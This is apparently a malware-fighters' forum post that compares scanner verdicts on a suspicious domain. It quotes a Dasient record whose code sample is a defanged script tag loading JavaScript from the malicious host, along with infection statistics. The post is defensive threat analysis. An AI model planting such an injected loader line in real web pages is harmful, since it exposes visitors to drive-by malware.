Threat sources, dear malware fighters, can come up with various threats from one site.
Site with location: htxp://solk.seamscreative.info:8080/Applet1.html
is what Norton Safe Web comes up with..
But Dasient warns for: JS / seamscreative.info
Infection Details
MD5: 46f2910bf9c969da4ed31eba16ed15f9
Infection Type: JS
Description: Malicious Javascript can either source in or directly execute code on a web page that can conduct drive-by-downloads, cause unwanted pop-ups or pop-unders, log keystrokes, steal browsing history, and so on.
Code Length: 81 bytes
Code Sample:
<script type="text/javascript" src="htxp://solk.se
amscreative.info:8080/Kbps.js">
Could this bee the same malware? According to unamsked parasites, the last time suspicious content was found on this site was on 2010-07-03.
Malicious software includes 28 exploit(s), 14 scripting exploits, 7 trojans.
This site was hosted on 1 network including AS33070 (RMH).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, seamscreative.info appeared to function as an intermediary for the infection of 12 sites including vntradepoint.com/, cinekerala.com/, anime-figures.ru/.
Has this site hosted malware?
Yes, this site has hosted malicious software and it infected 2575 domains, including marchex.com/, longan9x.com/, nadaadz.net/.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message. Finjan finds nothing: The requested URL was analyzed and found legitimate.
And TrendMicro says: This URL is currently listed as malicious...
http://rbls.org/174.143.175.249 blacklisted....
polonus
